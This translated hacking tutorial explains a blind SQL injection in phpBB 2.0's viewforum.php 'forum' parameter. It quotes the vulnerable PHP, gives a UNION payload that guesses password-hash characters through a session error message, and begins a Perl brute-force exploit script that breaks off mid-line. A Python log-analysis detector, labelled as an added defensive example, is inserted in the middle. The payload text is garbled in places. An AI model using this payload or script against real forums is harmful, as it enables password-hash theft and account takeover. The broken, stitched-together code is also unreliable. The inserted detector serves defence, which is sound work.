It is hard to find a complete article about PHP injection, with working code for real PHP injection cases, anywhere on the Internet. So after a few weeks of hard work on MySQL and PHP, let me talk about what I found. I hope it helps you!
I believe you are already very familiar with ASP injection. PHP injection is harder than ASP, because PHP's magic_quotes_gpc option is a real headache: quotation marks cannot be used in the injection. Most PHP applications are paired with MySQL, and, seen from another angle, the functional limitations of MySQL also prevent SQL injection attacks to some extent. I will give an example here, using phpBB 2.0:
One variable in viewforum.php is not filtered:
if (isset($HTTP_GET_VARS[POST_FORUM_URL]) || isset($HTTP_POST_VARS[POST_FORUM_URL]))
{
    // this branch casts the value to an integer, so it is safe
    $forum_id = (isset($HTTP_GET_VARS[POST_FORUM_URL])) ? intval($HTTP_GET_VARS[POST_FORUM_URL]) : intval($HTTP_POST_VARS[POST_FORUM_URL]);
}
else if (isset($HTTP_GET_VARS['forum']))
{
    // the legacy 'forum' parameter is taken as-is, with no filtering at all
    $forum_id = $HTTP_GET_VARS['forum'];
}
else
{
    $forum_id = '';
}
This is the forum parameter, and it is put directly into the query below:
if (!empty($forum_id))
{
    // $forum_id is interpolated into the SQL string unquoted and unchecked
    $sql = "SELECT *
        FROM " . FORUMS_TABLE . "
        WHERE forum_id = $forum_id";
    if (!($result = $db->sql_query($sql)))
    {
        message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
    }
}
else
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
If this were ASP, I believe many people would already know how to inject it. But if the forum specified by forum_id does not exist, $result will be empty, the 'Could not obtain forums information' message is returned, and the code below is never executed.
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if (!($forum_row = $db->sql_fetchrow($result)))
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
The key is the line marked with the asterisk: the call to session_pagestart($user_ip, $thispage_id), a function defined in session.php.
It is long, so I will not paste all of it; if you are interested, check it yourself. What matters is that this function in turn calls session_begin(), as session_begin($user_id, $user_ip,
$thispage_id, TRUE), which is also defined in that file and contains the following code:
$sql = "UPDATE " . SESSIONS_TABLE . "
    SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = $page_id
Here session_page is defined as an integer column in MySQL, and it is assigned $page_id, which is our $forum_id. If that value is not an integer, MySQL rejects the UPDATE and phpBB reports an error:
'Error creating new session: session_begin'. So the value given to $forum_id is what matters, and I specify it as: -1% 20 union % 20 select % ,,1, 2%, from % 20phpbb_users % 20 where % 20user_id = 20and % 20ord (substring (user_password,) = 57, with no quotation marks! Although the specified forum_id does not exist, the query result need not be empty: the condition tests whether the ASCII value of the first character of that user_id's password is 57. If it is, $result in the first piece of code above is not empty, so the problematic function session_pagestart is executed; its argument is not an integer, so the UPDATE fails and 'Error creating new session: session_begin' is displayed, which tells you the first position was guessed correctly. The other positions work the same way.
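From the defender's side, the pattern above is easy to recognise in the web server log: viewforum.php is only ever meant to receive an integer forum id, and the character-by-character guessing shows up as one client sending many requests that probe successive positions of user_password. The following script is an added example, not code from the original article or from phpBB; the log lines are constructed, and the 10.0.0.x addresses and the short 'f' parameter name are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache common log format (not real traffic).
# 10.0.0.9 is the probing client; 10.0.0.5 and 10.0.0.7 are ordinary visitors.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2004:10:00:01 +0000] "GET /phpBB2/viewforum.php?forum=3 HTTP/1.0" 200 5120
10.0.0.9 - - [01/Jan/2004:10:00:02 +0000] "GET /phpBB2/viewforum.php?forum=-1%20union%20select%201%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57 HTTP/1.0" 200 812
10.0.0.9 - - [01/Jan/2004:10:00:03 +0000] "GET /phpBB2/viewforum.php?forum=-1%20union%20select%201%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,2,1))=97 HTTP/1.0" 200 812
10.0.0.9 - - [01/Jan/2004:10:00:04 +0000] "GET /phpBB2/viewforum.php?forum=-1%20union%20select%201%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,3,1))=102 HTTP/1.0" 200 812
10.0.0.7 - - [01/Jan/2004:10:00:05 +0000] "GET /phpBB2/viewforum.php?f=12 HTTP/1.0" 200 4980
10.0.0.7 - - [01/Jan/2004:10:00:06 +0000] "GET /phpBB2/viewtopic.php?t=44 HTTP/1.0" 200 7731
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
INT_RE = re.compile(r'^-?\d+$')
# position argument of substring(user_password, N, 1), as used in the probing above
PROBE_RE = re.compile(r'substring\s*\(\s*user_password\s*,\s*(\d+)\s*,\s*1\s*\)', re.I)

def forum_id_values(target):
    """Return the URL-decoded 'forum' and 'f' parameter values of a request target."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [v for key in ('forum', 'f') for v in qs.get(key, [])]

def analyse(log_text):
    """Return (suspicious_requests, enumerating_clients) for a block of log text."""
    suspicious = []                  # (client ip, decoded forum value) for non-integer ids
    positions = defaultdict(set)     # client ip -> set of password positions it probed
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or '/viewforum.php' not in m['target']:
            continue
        for value in forum_id_values(m['target']):
            if INT_RE.match(value):
                continue             # a plain integer is the only legitimate shape
            suspicious.append((m['ip'], value))
            for pos in PROBE_RE.findall(value):
                positions[m['ip']].add(int(pos))
    # three or more distinct positions from one client is the blind-guessing signature
    enumerating = sorted(ip for ip, pos in positions.items() if len(pos) >= 3)
    return suspicious, enumerating

if __name__ == '__main__':
    bad, clients = analyse(SAMPLE_LOG)
    for ip, value in bad:
        print(f"non-integer forum id from {ip}: {value}")
    print("clients enumerating user_password:", clients)
```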
Without this error message, I think it would be hard to tell whether the injection succeeded even when it did; the error message is what makes it usable. That is the end of the analysis. A piece of test code is attached below; with slight modifications it can be used to guess other similar MD5 passwords. It matches the English version of the error message, so for Chinese and other language packs you only need to change the string it looks for.
use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;
print "************************\n";
print "phpbb viewforum.php exp\n";
print "code by pinkeyes\n";
print "www.icehack.com\n";
print "*************************\n";
print "please enter the weak file's url:\n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.php\n";
$adr = <STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack\n";
$u = <STDIN>;
chomp($u);
print "work starting, please wait!\n";
# candidate characters of an md5 hex digest: ASCII codes of '0'..'9' and 'a'..'f'
@pink = (48..57);
@pink = (@pink, 97..102);
for ($j = 1; $j <= 32; $j++) {        # one pass per hex digit of the 32-character hash
    for ($i = 0; $i < @pink; $i++) {  # try each candidate character at this position
        $url = $adr . "?forum=-1%20union%20select%, from%20phpbb_users%20where%
# the listing breaks off here in the source